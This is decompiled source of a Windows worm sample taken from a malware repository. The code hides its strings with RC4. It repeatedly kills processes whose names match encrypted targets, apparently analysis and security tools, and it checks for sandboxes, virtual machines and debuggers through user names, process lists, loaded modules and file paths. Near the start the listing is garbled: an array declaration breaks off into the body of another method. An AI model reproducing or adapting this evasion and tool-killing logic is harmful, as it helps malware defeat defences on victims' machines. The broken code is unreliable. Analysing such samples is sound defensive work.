// Decompiled with JetBrains decompiler // Type: ajhfsdlhjasnagfgewfwsg.reityureoiuterioutreoiutioerutoierutoiert // Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 170F4640-026D-46A0-96EF-63F7CE568476 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using Microsoft.Win32; using System; using System.Diagnostics; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; using System.Windows.Forms; namespace ajhfsdlhjasnagfgewfwsg { [StandardModule] internal sealed class reityureoiuterioutreoiutioerutoierutoiert { private static object D; private static string R; private static string FullFile; private static string B = RRRRR.RC4("šZèS\u000EQÆ\vú{\u0081\f÷\\Ú\u0016Ê{ÊÔtïÜ\u0001ú_Z»cmk;!gTGö", "Sikan"); private static object pid = RuntimeHelpers.GetObjectValue(reityureoiuterioutreoiutioerutoierutoiert.regPID.GetValue(RRRRR.RC4("è{Â{>qæb´", "Sikan"))); private static string id = RRRRR.RC4("\u008F?™'|?¡\u0018çvÿjŠ(Ãt–8ËÔ\u001Dˆ\u0081", "Sikan"); private static RegistryKey regPID = Registry.LocalMachine.OpenSubKey(RRRRR.RC4("n\u001F?\u0006æ1EþªsV‚.M>\u001B\u00BDøÃ\u001CðÏ/Ó£{>æÓ1! \u0016¨:\u008D\\ù&H•v9†", "Sik3"), false); private static string[] sExes = new string[6] { RRRRR.RC4("ÒfÈ}$jáN¢-¢,–t‚$", "Sikan"), RRRRR.RC4("ÒfÈ}$jñD\u00BE/µ1Ô?Ÿ9Æ", "Sikan"), RRRRR.RC4("Ï`ßz8zóY»u¢&Ý", "Sikan"), RRRRR.RC4("Ù\u007FÝ1.j÷", "Sikan"), RRRRR.RC4("ËgÄy-MúB¤u¢&Ý", "Sikan"), RRRRR.RC4("ËpÞ^%sþRª>µpÝiŸ", "Sikan") }; private static string[] sUsers = new string[3] { RRRRR.RC4("ÍzÈm%sÿN", "Sikan"), RRRRR.RC4("ÍzÈm", "Sikan"), RRRRR.RC4("Û|ßm.|æ^£>µ", "Sikan") }; private static string[] sModules = new string[4] { RRRRR.RC4("ÙyÄ@'}õ\u0005´7«", "Sikan"), RRRRR.RC4("Ü`ß@sþi¿#ç\u0019ÊpŠ)ÊvŠÆjÝÔ\u0015ëUk", "Sikan"), false) == 0; goto label_6; label_1: num2 = -1; switch (num1) { case 2: goto label_6; } } catch (Exception ex) when ( { // ISSUE: unable to correctly present filter int num3; if (ex is Exception & num1 != 0 & num3 == 0) { SuccessfulFiltering; } else throw; } ) { ProjectData.SetProjectError(ex); goto label_1; } throw ProjectData.CreateProjectError(-2146828237); label_6: int num4 = flag ? 1 : 0; if (num2 == 0) return num4 != 0; ProjectData.ClearProjectError(); return num4 != 0; } public static bool dsfkjhsdlkfvuoisd324234ufoiuewrxc() { int num1; bool flag; int num2; try { ProjectData.ClearProjectError(); num1 = 2; reityureoiuterioutreoiutioerutoierutoiert.T(); flag = Operators.CompareString(reityureoiuterioutreoiutioerutoierutoiert.R, RRRRR.RC4("îDÚ~9w\u00B2x†\u001C†~ñX", "Sikan"), false) == 0; goto label_6; label_1: num2 = -1; switch (num1) { case 2: goto label_6; } } catch (Exception ex) when ( { // ISSUE: unable to correctly present filter int num3; if (ex is Exception & num1 != 0 & num3 == 0) { SuccessfulFiltering; } else throw; } ) { ProjectData.SetProjectError(ex); goto label_1; } throw ProjectData.CreateProjectError(-2146828237); label_6: int num4 = flag ? 1 : 0; if (num2 == 0) return num4 != 0; ProjectData.ClearProjectError(); return num4 != 0; } public static object dsfkjhsdlkfvu44oisd324234ufoiuewrxc() { int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ÝnØv", "Sikan"), false) == 0) reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill(); checked { ++index; } } object obj; return obj; } public static object dsfkjhsd324234lkfvu44oisd324234ufoiuewrxc() { int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("×eÁf/põ", "Sikan"), false) == 0) reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill(); checked { ++index; } } object obj; return obj; } public static object dsfhsd324234lkfvu44oisd324234ufoiuewrxc() { int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ù_èQ\f[Ün", "Sikan"), false) == 0) reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill(); checked { ++index; } } object obj; return obj; } public static object asdjsagdkjxzcyiusayeiuwqyeiuwqyeiuwqyeiuwqeysAnalyzer() { int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ËpÞk.\u007FóE±7\u00BE$Ýc", "Sikan"), false) == 0) reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill(); checked { ++index; } } object obj; return obj; } public static object asdjsagdkjxzcyiusayeiuwqyeiuwqyeiuwqyeiuwqeunbelt() { int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ëKìR8dñ", "Sikan"), false) == 0) reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill(); checked { ++index; } } object obj; return obj; } public static object dsfhsd3234lkfvu44oisd324234ufoiuewrxc() { int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("úmÙj;vó_µ(¢,Îx™$", "Sikan"), false) == 0) reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill(); checked { ++index; } } object obj; return obj; } public static object dsfhsd3234lkfvu4445545oisd324234ufoiuewrxc() { int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ÕkÌr", "Sikan"), false) == 0) reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill(); checked { ++index; } } object obj; return obj; } public static bool dsfhsd3234lkfvu444554d324234ufoiuewrxc() { int num1; bool flag; int num2; try { ProjectData.ClearProjectError(); num1 = 2; flag = Process.GetProcessesByName(RRRRR.RC4("ëkÄz\u0018dñ", "Sikan")).Length >= 1; goto label_6; label_1: num2 = -1; switch (num1) { case 2: goto label_6; } } catch (Exception ex) when ( { // ISSUE: unable to correctly present filter int num3; if (ex is Exception & num1 != 0 & num3 == 0) { SuccessfulFiltering; } else throw; } ) { ProjectData.SetProjectError(ex); goto label_1; } throw ProjectData.CreateProjectError(-2146828237); label_6: int num4 = flag ? 1 : 0; if (num2 == 0) return num4 != 0; ProjectData.ClearProjectError(); return num4 != 0; } public static bool dsfhsd3234lvu444554d324234ufoiuewrxc() { int num1; bool flag; int num2; try { ProjectData.ClearProjectError(); num1 = 2; flag = Operators.CompareString(Application.ExecutablePath, Application.StartupPath + RRRRR.RC4("äzÌr;~÷\u0005µ#¢", "Sikan"), false) == 0; goto label_6; label_1: num2 = -1; switch (num1) { case 2: goto label_6; } } catch (Exception ex) when ( { // ISSUE: unable to correctly present filter int num3; if (ex is Exception & num1 != 0 & num3 == 0) { SuccessfulFiltering; } else throw; } ) { ProjectData.SetProjectError(ex); goto label_1; } throw ProjectData.CreateProjectError(-2146828237); label_6: int num4 = flag ? 1 : 0; if (num2 == 0) return num4 != 0; ProjectData.ClearProjectError(); return num4 != 0; } public static bool dsfhsd345345234lvu444554d324234ufoiuewrxc() { int num1; bool flag; int num2; try { ProjectData.ClearProjectError(); num1 = 2; flag = Operators.ConditionalCompareObjectEqual(reityureoiuterioutreoiutioerutoierutoiert.pid, (object) reityureoiuterioutreoiutioerutoierutoiert.id, false); goto label_6; label_1: num2 = -1; switch (num1) { case 2: goto label_6; } } catch (Exception ex) when ( { // ISSUE: unable to correctly present filter int num3; if (ex is Exception & num1 != 0 & num3 == 0) { SuccessfulFiltering; } else throw; } ) { ProjectData.SetProjectError(ex); goto label_1; } throw ProjectData.CreateProjectError(-2146828237); label_6: int num4 = flag ? 1 : 0; if (num2 == 0) return num4 != 0; ProjectData.ClearProjectError(); return num4 != 0; } public static object sadiasudoiuszc98z7xc987283947324() { int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ë.S˜Ò‰™C", "Sikan3"), false) == 0) reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill(); checked { ++index; } } object obj; return obj; } public static object sadiasudoiu34szc98z7xc987283947324() { int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ÿ2V™È‹", "Sikan3"), false) == 0) reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill(); checked { ++index; } } object obj; return obj; } public static object sadiasudoiu34sz3c98z7xc987283947324() { int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("þ7D„ÔŸƒ", "Sikan3"), false) == 0) reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill(); checked { ++index; } } object obj; return obj; } public static object sadias33udoiu34sz3c98z7xc987283947324() { int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ÚmÌx.|æ", "Sikan"), false) == 0) reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill(); checked { ++index; } } object obj; return obj; } public static object sadias33udoiu3334sz3c98z7xc987283947324() { int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ï`Ãz", "Sikan"), false) == 0) reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill(); checked { ++index; } } object obj; return obj; } public static bool sadias333udoiu3334sz3c98z7xc987283947324() { int num1; bool flag; int num2; try { ProjectData.ClearProjectError(); num1 = 2; flag = Process.GetProcessesByName(RRRRR.RC4("Ù\u007FÝ", "Sikan")).Length >= 1; goto label_6; label_1: num2 = -1; switch (num1) { case 2: goto label_6; } } catch (Exception ex) when ( { // ISSUE: unable to correctly present filter int num3; if (ex is Exception & num1 != 0 & num3 == 0) { SuccessfulFiltering; } else throw; } ) { ProjectData.SetProjectError(ex); goto label_1; } throw ProjectData.CreateProjectError(-2146828237); label_6: int num4 = flag ? 1 : 0; if (num2 == 0) return num4 != 0; ProjectData.ClearProjectError(); return num4 != 0; } public static object sadias333udo334sz3c98z7xc987283947324() { int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ÓlÔl(`óF\u00B27¢,", "Sikan"), false) == 0) reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill(); checked { ++index; } } object obj; return obj; } public static object sadias33443udo334sz3c98z7xc987283947324() { int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("Ð`Ç~(yæC\u00B9(", "Sikan"), false) == 0) reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill(); checked { ++index; } } object obj; return obj; } public static object sadias3344223udo334sz3c98z7xc987283947324() { int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1); int index = 0; while (index <= num) { string Left = Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName); if (Operators.CompareString(Left, RRRRR.RC4("ÒfÈ}$jáN¢-¢,", "Sikan"), false) == 0) reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill(); else if (Operators.CompareString(Left, RRRRR.RC4("ÒfÈ}$jñD\u00BE/µ1Ô", "Sikan"), false) == 0) reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill(); checked { ++index; } } object obj; return obj; } public static bool asdjsagdkjxzcyiusayeiuwqyeiuwqyeiuwqyeiuwqeandbox() { bool flag; try { flag = reityureoiuterioutreoiutioerutoierutoiert.UserCheck() || reityureoiuterioutreoiutioerutoierutoiert.ProcessCheck() || Application.ExecutablePath.Contains(RRRRR.RC4("Þ`ÁzewêN", "Sikan")) || Application.ExecutablePath.Contains(RRRRR.RC4("ëhÀo'w\u00BCN¨>", "Sikan")) | Operators.CompareString(Interaction.Environ(RRRRR.RC4("ÍzÈm%sÿN", "Sikan")), RRRRR.RC4("ÙgÉf", "Sikan"), false) == 0 | Operators.CompareString(Interaction.Environ(RRRRR.RC4("ÍzÈm%sÿN", "Sikan")), RRRRR.RC4("ùgÉf", "Sikan"), false) == 0 || reityureoiuterioutreoiutioerutoierutoiert.ModuleCheck() || Operators.CompareString(Application.StartupPath, "C:\\", false) == 0 | Operators.CompareString(Application.StartupPath, "D:\\", false) == 0 | Operators.CompareString(Application.StartupPath, "F:\\", false) == 0 | Operators.CompareString(Application.StartupPath, "X:\\", false) == 0 & Operators.CompareString(Interaction.Environ(RRRRR.RC4("ÍzÈm%sÿN", "Sikan")), RRRRR.RC4("PìØûâ)±ì", "Sikan32"), false) == 0; } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } return flag; } private static bool ProcessCheck() { bool flag; try { Process[] p = reityureoiuterioutreoiutioerutoierutoiert.p; int index = 0; while (index < p.Length) { string Left = p[index].ProcessName + ".exe"; if (Conversions.ToBoolean(Operators.OrObject(Operators.OrObject(Operators.OrObject(Operators.OrObject(Operators.OrObject(Operators.CompareObjectEqual((object) Left, reityureoiuterioutreoiutioerutoierutoiert.sExes.GetValue(0), false), Operators.CompareObjectEqual((object) Left, reityureoiuterioutreoiutioerutoierutoiert.sExes.GetValue(1), false)), Operators.CompareObjectEqual((object) Left, reityureoiuterioutreoiutioerutoierutoiert.sExes.GetValue(2), false)), Operators.CompareObjectEqual((object) Left, reityureoiuterioutreoiutioerutoierutoiert.sExes.GetValue(3), false)), Operators.CompareObjectEqual((object) Left, reityureoiuterioutreoiutioerutoierutoiert.sExes.GetValue(4), false)), Operators.CompareObjectEqual((object) Left, reityureoiuterioutreoiutioerutoierutoiert.sExes.GetValue(5), false)))) { flag = true; break; } checked { ++index; } } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } return flag; } private static bool UserCheck() { bool flag; try { int num = checked (reityureoiuterioutreoiutioerutoierutoiert.sUsers.Length - 1); int index = 0; while (index <= num) { if (Operators.ConditionalCompareObjectEqual((object) Interaction.Environ(RRRRR.RC4("vüÕäå,¨à", "Sikan32")), reityureoiuterioutreoiutioerutoierutoiert.sUsers.GetValue(index), false)) { flag = true; break; } checked { ++index; } } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } return flag; } private static bool ModuleCheck() { bool flag; try { int num = checked (reityureoiuterioutreoiutioerutoierutoiert.sModules.Length - 1); int index = 0; while (index <= num) { string lpModuleName = Conversions.ToString(reityureoiuterioutreoiutioerutoierutoiert.sModules.GetValue(index)); if (reityureoiuterioutreoiutioerutoierutoiert.GetModuleHandle(ref lpModuleName) != 0L) { flag = true; break; } checked { ++index; } } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } return flag; } } }